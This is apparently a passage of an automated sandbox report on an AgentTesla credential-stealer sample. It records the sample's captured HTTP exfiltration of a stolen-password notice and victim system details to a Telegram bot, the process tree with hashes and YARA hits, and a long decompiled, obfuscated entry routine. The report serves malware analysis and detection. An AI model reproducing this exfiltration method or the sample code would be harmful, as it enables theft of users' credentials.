                                                                        2021-09-14 16:42:56 UTC222OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 37 63 39 30 34 62 30 64 31 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 39 38 35 37 35 38 39 35 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 37 37 63 39 30 34 62 30 64 31 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 31 32 33 37 31 36 0a 4f 53 46 75 6c 6c
                                                                        Data Ascii: -----------------------------8d977c904b0d17dContent-Disposition: form-data; name="chat_id"1985758957-----------------------------8d977c904b0d17dContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/123716OSFull
                                                                        2021-09-14 16:42:56 UTC223INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0
                                                                        Date: Tue, 14 Sep 2021 16:42:56 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 638
                                                                        Connection: close
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                        {"ok":true,"result":{"message_id":7,"from":{"id":1996953049,"is_bot":true,"first_name":"OriginUSA","username":"OriginUSA12_bot"},"chat":{"id":1985758957,"first_name":"Keepoff","last_name":"Sniffers","username":"chatid12","type":"private"},"date":1631637776,"document":{"file_name":"user-123716 2021-09-14 09-45-38.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAMHYUDREHsYwFKRHsm_ZN8NEzGl-lEAAqgBAAI6FAhG_oqm2GPUaHcgBA","file_unique_id":"AgADqAEAAjoUCEY","file_size":436},"caption":"New PW Recovered!\n\nUser Name: user/123716\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: CI and PL of CMZBD-210090.exe PID: 5656 Parent PID: 6440

                                                                        General

                                                                        Start time:18:36:57
                                                                        Start date:14/09/2021
                                                                        Path:C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe'
                                                                        Imagebase:0x400000
                                                                        File size:126976 bytes
                                                                        MD5 hash:1F9B03378D7DC859A1C6E13A5832582E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Visual Basic
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: RegAsm.exe PID: 6836 Parent PID: 5656

                                                                        General

                                                                        Start time:18:39:04
                                                                        Start date:14/09/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe'
                                                                        Imagebase:0x9a0000
                                                                        File size:64616 bytes
                                                                        MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: conhost.exe PID: 5404 Parent PID: 6836

                                                                        General

                                                                        Start time:18:39:05
                                                                        Start date:14/09/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >

                                                                          Analysis Process: CI and PL of CMZBD-210090.exe PID: 5656 Parent PID: 6440 CI and PL of CMZBD-210090.exeCOMMON

                                                                          Executed Functions

                                                                          Function 00401114, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 608COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			_entry_() {
				signed char _t444;
				intOrPtr* _t445;
				signed char _t447;
				signed int _t448;
				signed int _t450;
				signed char _t451;
				signed char _t453;
				signed char _t454;
				signed int _t456;
				intOrPtr* _t459;
				signed char _t625;
				signed char _t626;
				signed int _t629;
				signed char _t630;
				signed char _t631;
				signed int _t633;
				void* _t634;
				signed int _t635;
				signed int* _t637;
				signed char _t640;
				signed int* _t645;
				signed char _t650;
				signed char _t691;
				intOrPtr* _t711;
				signed int _t712;
				void* _t718;
				void* _t719;
				intOrPtr* _t720;
				intOrPtr* _t727;
				void* _t749;
				signed int _t750;
				signed int _t760;
				signed int _t764;
				signed int _t776;
				signed int _t777;
				void* _t787;
				signed int _t792;
				signed int _t807;
				intOrPtr _t810;
				signed int _t813;
				intOrPtr _t817;
				signed int _t822;
				intOrPtr _t823;
				void* _t829;
				intOrPtr _t834;
				intOrPtr _t837;

				_push("VB5!6&*"); // executed
				L0040110C(); // executed
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 + _t444;
				 *_t444 =  *_t444 ^ _t444;
				 *_t444 =  *_t444 + _t444;
				_t445 = _t444 + 1;
				 *_t445 =  *_t445 + _t445;
				 *_t445 =  *_t445 + _t445;
				 *_t445 =  *_t445 + _t445;
				_t1 = _t445 + 0x7d;
				 *_t1 =  *((intOrPtr*)(_t445 + 0x7d)) + _t712;
				if( *_t1 < 0) {
					L5:
					asm("invalid");
					asm("out 0xae, eax");
					_t446 =  *[ss:esp+ecx*4];
					_t712 = 0x80a54562;
					asm("aaa");
					asm("sbb [edx], bh");
					_t719 = _t718 - 1;
					asm("lodsd");
					_t650 = 0x0000002b ^  *(_t691 - 0x48ee309a);
					asm("cdq");
					asm("iretw");
					asm("adc [edi+0xaa000c], esi");
					asm("pushad");
					asm("rcl dword [ebx], cl");
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					L7:
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					 *((intOrPtr*)(_t719 + 7)) =  *((intOrPtr*)(_t719 + 7)) + _t691;
					L8:
					_t720 = _t719 - 1;
					_pop(es);
					 *_t446 =  *_t446 + _t446;
					_push(_t712);
					 *_t446 =  *_t446 + _t446;
					 *_t446 =  *_t446 + _t446;
					_t447 = _t446;
					L9:
					_t750 = _t749 + 1;
					if(_t750 < 0) {
						L12:
						 *_t712 =  *_t712 + _t712;
						_t448 = _t447 -  *_t447;
						 *_t650 =  *_t650 + 1;
						asm("daa");
						 *_t448 =  *_t448 + _t448;
						 *_t712 =  *_t712 + _t448;
						_push(es);
						_t24 = _t760 + 0x78;
						 *_t24 =  *((intOrPtr*)(_t760 + 0x78)) + _t712;
						if( *_t24 == 0) {
							L17:
							 *_t650 =  *_t650 + _t691;
							_t450 = _t448 + 0xef;
							_t750 = _t750 + 1;
							_t807 = _t750;
							asm("outsd");
							if(_t807 < 0) {
								L26:
								if(_t813 < 0) {
									L35:
									 *_t750 =  *_t750 | _t450;
									 *((intOrPtr*)(_t650 + 0x68)) =  *((intOrPtr*)(_t650 + 0x68)) + _t450;
									L36:
									_push(0x366b6365);
									 *0x50000a01 =  *0x50000a01 + _t450;
									_t451 = _t450 - 1;
									_push(_t712);
									_push(_t776);
									_t760 = _t760 - 1 + 2;
									_push(_t712);
									 *0x5a01248 =  *0x5a01248 + _t451;
									 *_t650 =  *_t650 + 1;
									_t453 = (_t451 &  *_t451) -  *(_t451 &  *_t451);
									 *_t453 =  *_t453 + _t453;
									_t454 = _t453 |  *_t750;
									 *((intOrPtr*)(_t650 + 0x68)) =  *((intOrPtr*)(_t650 + 0x68)) + _t454;
									asm("arpl [gs:ebx+0x35], bp");
									 *0x45000b01 =  *0x45000b01 + _t454;
									L37:
									_t776 = _t776 - 1;
									_push(_t776);
									_push(_t712);
									_t760 = _t760 + 1 - 1;
									_t691 = _t776;
									_t650 = _t650 + 1;
									 *0x16801c98 =  *0x16801c98 + _t454;
									 *_t454 =  *_t454 & _t454;
									 *_t650 =  *_t650 + 1;
									 *[es:eax] =  *[es:eax] + _t454;
									 *_t650 =  *_t650 + _t691;
									_push(es);
									 *((intOrPtr*)(_t650 + 0x68)) =  *((intOrPtr*)(_t650 + 0x68)) + _t454;
									asm("arpl [gs:ebx+0x34], bp");
									L38:
									_t456 = (_t454 ^ 0x00000000) + 0x42000601;
									_t822 = _t456;
									if(_t822 < 0) {
										L45:
										asm("arpl [edi+ebp*2+0x69], bp");
									}
									if(_t822 >= 0) {
										L44:
										 *((intOrPtr*)(_t650 + 0x79)) =  *((intOrPtr*)(_t650 + 0x79)) + _t456;
										goto L45;
									}
									if (_t822 >= 0) goto L41;
									_t630 = _t456 + 0x14280d20;
									 *_t630 =  *_t630 & _t630;
									 *_t650 =  *_t650 + 1;
									_t631 = _t630 -  *_t630;
									 *_t631 =  *_t631 + _t631;
									_t626 = _t631 | 0x00000006;
									 *((intOrPtr*)(_t650 + 0x68)) =  *((intOrPtr*)(_t650 + 0x68)) + _t626;
									asm("arpl [gs:ebx+0x33], bp");
									 *0x4e000b01 =  *0x4e000b01 + _t626;
									asm("popad");
									_t750 =  *(_t760 + 0x1201ef6c) * 0x39796c70;
									 *0xac81ef0 =  *0xac81ef0 + _t626;
									_t727 = 0x1201ef04;
									_pop(ds);
									_t650 = _t650 + _t650;
									_t777 = _t776 +  *_t750;
									 *_t626 =  *_t626 + _t626;
									 *0x68430006 =  *0x68430006 + _t691;
									asm("arpl [gs:ebx+0x32], bp");
									 *0x74000601 =  *0x74000601 + _t626;
									_t823 =  *0x74000601;
									if(_t823 < 0) {
										L52:
										asm("aaa");
										 *_t750 =  *_t750 + _t626;
										 *0x65744c00 =  *0x65744c00 + _t626;
										asm("insd");
										asm("popad");
										 *0x17e81248 =  *0x17e81248 + _t626;
										asm("adc bl, [ebx]");
										_t650 = _t650 + _t650;
										_t760 = _t760 +  *0x11000000;
										_pop(es);
										 *0x1201EF74 =  *((intOrPtr*)(0x1201ef74)) + _t691;
										if( *((intOrPtr*)(0x1201ef74)) == 0) {
											L63:
											 *0x14a01518 =  *0x14a01518 + _t626;
											asm("sbb [eax], al");
											 *_t650 =  *_t650 + 1;
											asm("daa");
											 *_t626 =  *_t626 + _t626;
											 *((intOrPtr*)(0x1201ef04 + _t626)) =  *((intOrPtr*)(0x1201ef04 + _t626)) + _t712;
											 *((intOrPtr*)(0x1201ef74)) =  *((intOrPtr*)(0x1201ef74)) + _t691;
											if( *((intOrPtr*)(0x1201ef74)) == 0) {
												L71:
												 *_t650 =  *_t650 + 1;
												asm("sbb eax, [eax]");
												 *_t626 =  *_t626 + _t626;
												_pop(ss);
												_t459 = _t626 + 0x73694c00;
												if(_t459 == 0) {
													L74:
													_t691 = _t691 + 1 - 1 + 1;
													 *_t650 =  *_t650 + _t712;
													asm("adc eax, [eax]");
													 *_t650 =  *_t650 + 1;
													asm("sbb al, [eax]");
													 *_t459 =  *_t459 + _t459;
													asm("sbb [esi], eax");
													 *((intOrPtr*)(_t691 + 0x6d + _t760 * 2)) =  *((intOrPtr*)(_t691 + 0x6d + _t760 * 2)) + _t712;
													L75:
													_push(_t777);
													_t764 =  *(_t760 + 0x65) * 0xb003172;
												}
												 *_t459 =  *_t459 + _t691;
												 *_t691 =  *_t691 + _t712;
												asm("adc al, 0x0");
												 *_t650 =  *_t650 + 1;
												_t456 = _t459 + 0xd0 +  *((intOrPtr*)(_t459 + 0xd0 - 0x3dfb40f9)) -  *((intOrPtr*)(_t459 + 0xd0 +  *((intOrPtr*)(_t459 + 0xd0 - 0x3dfb40f9))));
												 *_t456 =  *_t456 + _t456;
												asm("sbb [esi], al");
												 *((intOrPtr*)(_t650 + 0x6f)) =  *((intOrPtr*)(_t650 + 0x6f)) + _t456;
												asm("insd");
												L73:
												asm("bound ebp, [edi+0x31]");
												 *_t727 =  *_t727 + _t456;
												_push(_t760);
												_push(_t712);
												_push(_t712);
												_push(_t712);
												_t459 = (_t456 + 0x16800348 |  *(_t456 + 0x16800348)) - 1;
												goto L74;
											}
											asm("outsd");
											asm("outsb");
											_t456 = _t626 ^  *_t626;
											_push(es);
											 *_t750 =  *_t750 + _t456;
											 *((intOrPtr*)(_t650 + 0x4f)) =  *((intOrPtr*)(_t650 + 0x4f)) + _t691;
											_t777 = _t777 - 1;
											_t760 = _t760 + 1;
											_push(_t712);
											_t691 = _t691 - 1;
											 *0xd982490 =  *0xd982490 + _t456;
											L65:
											_t727 = 0x1201ef04;
											_pop(ss);
											_t650 = _t650 + _t650;
											_t777 = _t777 +  *0x1201ef04;
											 *_t456 =  *_t456 + _t456;
											 *0x704f0007 =  *0x704f0007 + _t712;
											if( *0x704f0007 == 0) {
												goto L73;
											}
											asm("outsd");
											asm("outsb");
											_t625 = _t456 ^  *_t456;
											_push(es);
											 *_t750 =  *_t750 + _t625;
											 *((intOrPtr*)(_t625 + 0x72)) =  *((intOrPtr*)(_t625 + 0x72)) + _t712;
											_t777 =  *(_t691 + 0x70) * 0xf0050032;
											asm("invalid");
											_t626 =  *((short*)(0x1201ef04 + _t760 * 8));
											L67:
											 *_t712 =  *_t712 + _t712;
											_push(ss);
											_t650 = _t650 + _t650;
											_t777 = _t777 +  *0x16000000;
											L68:
											 *_t750 =  *_t750 + _t712;
											_pop(es);
											_t103 = _t727 + 0x70;
											 *_t103 =  *((intOrPtr*)(_t727 + 0x70)) + _t691;
											if( *_t103 == 0) {
												goto L75;
											}
											asm("outsd");
											asm("outsb");
											L70:
											 *_t626 =  *_t626 ^ _t626;
											_push(es);
											 *((intOrPtr*)(_t626 + _t626)) =  *((intOrPtr*)(_t626 + _t626)) + _t626;
											_push(_t650);
											_t777 = _t777 - 1;
											_t691 = _t691 + 1;
											_push(_t712);
											 *0x1680ca8 =  *0x1680ca8 + _t626;
											asm("adc eax, 0x1b03ff00");
											goto L71;
										}
										asm("outsd");
										asm("outsb");
										 *[ss:esi] =  *[ss:esi] + _t626;
										 *((intOrPtr*)(_t626 + _t626)) =  *((intOrPtr*)(_t626 + _t626)) + _t691;
										_t712 = _t712 + 1;
										_push(_t712);
										_push(_t712);
										_t777 = _t777 + 2;
										_push(_t777);
										_push(_t712);
										_t750 = _t750 - 1;
										_t760 = _t760 + 3;
										 *0x52801e0 =  *0x52801e0 + _t456;
										_t727 = 0x1201ef04;
										asm("sbb al, [eax]");
										 *_t650 =  *_t650 + 1;
										_t456 = _t456 -  *_t456;
										 *_t456 =  *_t456 + _t456;
										asm("adc al, [edi]");
										 *((intOrPtr*)(0x1201ef74)) =  *((intOrPtr*)(0x1201ef74)) + _t691;
										_t834 =  *((intOrPtr*)(0x1201ef74));
										if(_t834 == 0) {
											goto L65;
										}
										asm("outsd");
										asm("outsb");
										_t629 = _t456 ^ 0x09010600;
										 *((intOrPtr*)(_t650 + 0x74)) =  *((intOrPtr*)(_t650 + 0x74)) + _t712;
										asm("popad");
										asm("insw");
										asm("gs outsb");
										 *[fs:0x11d00d20] =  *[fs:0x11d00d20] + _t629;
										_t626 = _t629 | 0x04bf11d0;
										asm("out dx, eax");
										 *_t712 =  *_t712 + _t712;
										asm("sbb [eax], eax");
										L59:
										 *_t650 =  *_t650 + 1;
										 *_t626 =  *_t626 - _t626;
										 *_t626 =  *_t626 + _t626;
										asm("adc eax, [edi]");
										_t88 = _t727 + 0x70;
										 *_t88 =  *((intOrPtr*)(_t727 + 0x70)) + _t691;
										if( *_t88 == 0) {
											goto L67;
										}
										asm("outsd");
										asm("outsb");
										_t626 = _t626 ^ 0x00000000;
										_push(es);
										 *_t626 =  *_t626 + _t691;
										_t90 = _t750 + 0x6f;
										 *_t90 =  *((intOrPtr*)(_t750 + 0x6f)) + _t691;
										_t837 =  *_t90;
										asm("outsb");
										if(_t837 == 0) {
											goto L68;
										}
										if(_t837 < 0) {
											goto L70;
										}
										 *[ss:0x14a01518] =  *[ss:0x14a01518] + _t626;
										goto L63;
									}
									asm("insb");
									if(_t823 >= 0) {
										if(_t829 < 0) {
											goto L59;
										}
										_t760 =  *(_t727 + 0x6e) * 0x1060037;
										asm("outsd");
										asm("outsb");
										goto L52;
									}
									 *0xd200f00 =  *0xd200f00 + _t626;
									_push(ds);
									_t650 = _t650 + _t650;
									 *_t626 =  *_t626 + _t626;
									 *_t750 =  *_t750 + _t691;
									_push(es);
									 *((intOrPtr*)(_t650 + 0x68)) =  *((intOrPtr*)(_t650 + 0x68)) + _t626;
									asm("arpl [gs:ebx+0x31], bp");
									 *0x43000701 =  *0x43000701 + _t626;
									goto L44;
								}
								asm("insd");
								asm("gs outsb");
								if (_t813 == 0) goto L28;
								_push(ds);
								asm("lock movsx eax, word [edi+ebp*8]");
								 *_t691 =  *_t691 + _t712;
								_t633 = _t450 + 0x000000f0 & 0x2a03ff00;
								 *_t633 =  *_t633 + _t633;
								 *_t720 =  *_t720 + _t633;
								_t634 = _t633 + 0x78655400;
								if(_t634 == 0) {
									L34:
									_t635 = _t634 - 1;
									 *(_t635 + 0xa) =  *(_t635 + 0xa) & _t712;
									_t720 = 0x1201ef04;
									 *_t650 =  *_t650 + 1;
									_t450 = (_t635 &  *_t635) -  *(_t635 &  *_t635);
									 *_t450 =  *_t450 + _t450;
									goto L35;
								}
								 *_t712 =  *_t712 + _t634;
								_t637 = _t634 + 0x70;
								 *_t637 =  *_t637 | _t691;
								asm("adc al, 0xbf");
								 *_t650 =  *_t650 + _t691;
								_t454 =  &(_t637[0x3b]) | _t637[0x3b];
								if(_t720 - 1 < 0) {
									goto L37;
								}
								_t760 =  *(_t750 + 0x64) * 0x65646e65;
								asm("insb");
								 *_t712 =  *_t712 + _t712;
								_t454 = _t454 & 0x00000000;
								 *_t650 =  *_t650 + 1;
								L31:
								 *[es:eax] =  *[es:eax] + _t454;
								 *_t454 =  *_t454 + _t691;
								_push(es);
								 *((intOrPtr*)(_t650 + 0x68)) =  *((intOrPtr*)(_t650 + 0x68)) + _t454;
								asm("arpl [gs:ebx+0x37], bp");
								 *0x62000601 =  *0x62000601 + _t454;
								_t817 =  *0x62000601;
								if(_t817 < 0) {
									goto L38;
								}
								asm("insd");
								if(_t817 < 0) {
									goto L38;
								}
								 *0xa502148 =  *0xa502148 + _t454;
								goto L34;
							}
							if(_t807 < 0) {
								L25:
								_t450 = _t450 + 0x00000001 |  *(_t450 + 1);
								_t813 = _t450;
								if(_t813 < 0) {
									goto L36;
								}
								goto L26;
							}
							_t776 =  *(_t760 + 0x72) * 0x69;
							asm("outsb");
							 *[fs:edx] =  *[fs:edx] + _t712;
							 *_t450 =  *_t450 - _t450;
							 *_t650 =  *_t650 + 1;
							asm("daa");
							 *_t450 =  *_t450 + _t450;
							 *((intOrPtr*)(_t750 + _t450)) =  *((intOrPtr*)(_t750 + _t450)) + _t450;
							_t39 = _t760 + 0x78;
							 *_t39 =  *((intOrPtr*)(_t760 + 0x78)) + _t712;
							if( *_t39 == 0) {
								L24:
								_t450 = _t450 + 0xef;
								 *_t650 =  *_t650 + _t691;
								_push(es);
								 *((intOrPtr*)(_t650 + 0x6a)) =  *((intOrPtr*)(_t650 + 0x6a)) + _t712;
								asm("outsd");
								asm("o16 add [ss:edx], dl");
								_t760 = _t760 +  *((intOrPtr*)(_t450 + _t450));
								 *_t450 =  *_t450 + _t450;
								_push(es);
								 *_t450 =  *_t450 | _t450;
								_t650 = _t650 + _t650 + 1;
								asm("outsd");
								asm("insd");
								asm("insd");
								asm("popad");
								asm("outsb");
								 *[fs:eax] =  *[fs:eax] ^ _t450;
								goto L25;
							}
							 *_t450 =  *_t450 ^ _t450;
							_t640 = _t450 +  *((intOrPtr*)(_t450 + _t760 * 2));
							L21:
							_t454 = _t640 + 0xef;
							 *_t650 =  *_t650 + _t691;
							es = 0xbf05a01f;
							 *((intOrPtr*)(_t760 + 0x62)) =  *((intOrPtr*)(_t760 + 0x62)) + _t454;
							asm("arpl [esi+0x72], sp");
							asm("popad");
							 *_t712 =  *_t712 + _t712;
							asm("daa");
							_t650 = _t650 + _t650;
							_t776 = _t776 +  *_t750;
							 *_t454 =  *_t454 + _t454;
							 *0x65540006 =  *0x65540006 + _t454;
							_t810 =  *0x65540006;
							L22:
							if(_t810 < 0) {
								goto L31;
							}
							 *_t454 =  *_t454 ^ _t750;
							 *_t712 =  *_t712 + _t454;
							_t750 = _t750 + _t454 + 0x48;
							_t450 =  *((short*)(_t720 + _t760 * 8));
							goto L24;
						}
						_t454 = (_t448 ^  *_t448) +  *((intOrPtr*)((_t448 ^  *_t448) + _t750));
						asm("sbb esp, eax");
						 *((intOrPtr*)(_t720 + 0xb01ef04)) =  *((intOrPtr*)(_t720 + 0xb01ef04)) + _t720;
						L14:
						asm("out dx, eax");
						 *_t650 =  *_t650 + _t691;
						_pop(es);
						_t29 = _t650 + 0x6f;
						 *_t29 =  *((intOrPtr*)(_t650 + 0x6f)) + _t454;
						asm("outsb");
						if( *_t29 == 0) {
							goto L22;
						}
						asm("outsb");
						asm("adc ch, [ecx]");
						_t650 = _t650 + _t650;
						_t760 = _t760 +  *((intOrPtr*)(_t454 + _t454));
						 *_t454 =  *_t454 + _t454;
						_t640 = _t454 +  *_t750;
						_t32 = _t760 + 0x78;
						 *_t32 =  *((intOrPtr*)(_t760 + 0x78)) + _t712;
						if( *_t32 == 0) {
							goto L21;
						}
						_t448 = (_t640 ^  *_t640) +  *(_t640 ^  *_t640);
						 *(_t448 + 0xa) =  *(_t448 + 0xa) | _t712;
						_t720 = 0xb01ef04;
						goto L17;
					}
					asm("bound ebp, [gs:edi+0x6c]");
					_t454 = _t447;
					_pop(_t711);
					_t787 =  *(_t720 + 0x73) * 0x10d0038 - 1 + 1;
					 *_t711 =  *_t711 + _t650;
					 *_t454 =  *_t454 + _t454;
					_t712 = _t712 + 1;
					 *_t712 =  *_t712 + _t454;
					 *((intOrPtr*)(_t787 + _t711)) =  *((intOrPtr*)(_t787 + _t711)) + _t787;
					 *((intOrPtr*)(_t711 + 0x4d)) =  *((intOrPtr*)(_t711 + 0x4d)) + _t454;
					_t691 = _t650;
					_t760 = _t760 - 1 + 2;
					_push(_t650);
					_t750 = _t750 - 0xfffffffffffffffe;
					_t720 = _t720 - 1 + 1 + 1 - 1;
					 *0xe99 =  *0xe99 + _t712;
					_push(ss);
					 *_t454 =  *_t454 + _t454;
					_t650 = _t650 &  *_t750;
					 *_t454 =  *_t454 + _t454;
					asm("scasd");
					_push(ds);
					 *_t454 =  *_t454 + _t454;
					_t776 = _t787 - 1 + 3;
					 *((intOrPtr*)(_t750 + 3)) =  *((intOrPtr*)(_t750 + 3)) + _t454;
					 *_t691 =  *_t691 + 1;
					 *[es:eax] =  *[es:eax] + _t454;
					 *_t691 =  *_t691 + _t454;
					_push(es);
					_t18 = _t760 + 0x78;
					 *_t18 =  *((intOrPtr*)(_t760 + 0x78)) + _t712;
					if( *_t18 == 0) {
						goto L14;
					}
					_t645 = (_t454 ^ 0x00000000) +  *((intOrPtr*)((_t454 ^ 0x00000000) + _t750 * 2));
					 *_t645 =  *_t645 | _t650;
					_t447 =  &(_t645[0x6b]);
					 *_t650 =  *_t650 + _t691;
					_push(es);
					 *((intOrPtr*)(_t712 + 0x52)) =  *((intOrPtr*)(_t712 + 0x52)) + _t447;
					_t720 = _t720 - 1;
					_t712 = _t712 + 1;
					_t776 = _t776 + 1;
					_t691 = _t691 - 1;
					goto L12;
				}
				asm("in eax, 0x48");
				_t719 = _t445 + 1;
				asm("adc eax, 0xed999408");
				_t446 = 0x58;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				_t792 =  *0x58;
				asm("outsd");
				if(_t792 <= 0) {
					goto L7;
				}
				if(_t792 < 0) {
					goto L8;
				}
				asm("popad");
				_t760 =  *(_t719 + 0x76 + _t760 * 2) * 0;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				 *0x58 = 0x58 +  *0x58;
				_t776 = _t776 - 1;
				 *0x58 =  *0x58 ^ 0x00000058;
				_t447 = 0x5ef8f42f;
				if(0x5ef8f42f != 0) {
					goto L9;
				}
				asm("aam 0x40");
				asm("cdq");
				 *((char*)(_t650 - 0x38)) = 0x58;
				goto L5;
			}

















































                                                                          0x00401114
                                                                          0x00401119
                                                                          0x0040111e
                                                                          0x00401120
                                                                          0x00401122
                                                                          0x00401124
                                                                          0x00401126
                                                                          0x00401128
                                                                          0x00401129
                                                                          0x0040112b
                                                                          0x0040112d
                                                                          0x0040112f
                                                                          0x0040112f
                                                                          0x00401132
                                                                          0x00401176
                                                                          0x00401176
                                                                          0x00401178
                                                                          0x0040117a
                                                                          0x0040117e
                                                                          0x00401183
                                                                          0x00401188
                                                                          0x0040118a
                                                                          0x0040118b
                                                                          0x0040118c
                                                                          0x0040118d
                                                                          0x0040118e
                                                                          0x00401190
                                                                          0x00401196
                                                                          0x00401197
                                                                          0x0040119d
                                                                          0x0040119f
                                                                          0x004011a1
                                                                          0x004011a3
                                                                          0x004011a5
                                                                          0x004011a7
                                                                          0x004011a9
                                                                          0x004011ab
                                                                          0x004011ad
                                                                          0x004011af
                                                                          0x004011b1
                                                                          0x004011b3
                                                                          0x004011b5
                                                                          0x004011b7
                                                                          0x004011b8
                                                                          0x004011b8
                                                                          0x004011ba
                                                                          0x004011bc
                                                                          0x004011bd
                                                                          0x004011bd
                                                                          0x004011be
                                                                          0x004011bf
                                                                          0x004011c1
                                                                          0x004011c2
                                                                          0x004011c4
                                                                          0x004011c6
                                                                          0x004011c8
                                                                          0x004011c8
                                                                          0x004011c9
                                                                          0x00401235
                                                                          0x00401235
                                                                          0x00401237
                                                                          0x00401239
                                                                          0x0040123b
                                                                          0x0040123c
                                                                          0x0040123e
                                                                          0x00401240
                                                                          0x00401241
                                                                          0x00401241
                                                                          0x00401245
                                                                          0x00401278
                                                                          0x0040127a
                                                                          0x0040127c
                                                                          0x0040127e
                                                                          0x0040127e
                                                                          0x0040127f
                                                                          0x00401280
                                                                          0x004012f6
                                                                          0x004012f6
                                                                          0x00401362
                                                                          0x00401362
                                                                          0x00401364
                                                                          0x00401366
                                                                          0x00401366
                                                                          0x0040136b
                                                                          0x00401371
                                                                          0x00401373
                                                                          0x00401377
                                                                          0x00401378
                                                                          0x00401379
                                                                          0x0040137a
                                                                          0x00401387
                                                                          0x00401389
                                                                          0x0040138b
                                                                          0x0040138d
                                                                          0x0040138f
                                                                          0x00401392
                                                                          0x00401396
                                                                          0x0040139b
                                                                          0x0040139c
                                                                          0x0040139e
                                                                          0x0040139f
                                                                          0x004013a3
                                                                          0x004013a4
                                                                          0x004013a5
                                                                          0x004013a6
                                                                          0x004013b1
                                                                          0x004013b3
                                                                          0x004013b5
                                                                          0x004013b8
                                                                          0x004013ba
                                                                          0x004013bb
                                                                          0x004013be
                                                                          0x004013c1
                                                                          0x004013c3
                                                                          0x004013c3
                                                                          0x004013c8
                                                                          0x00401443
                                                                          0x00401443
                                                                          0x00401443
                                                                          0x004013ca
                                                                          0x00401440
                                                                          0x00401440
                                                                          0x00000000
                                                                          0x00401440
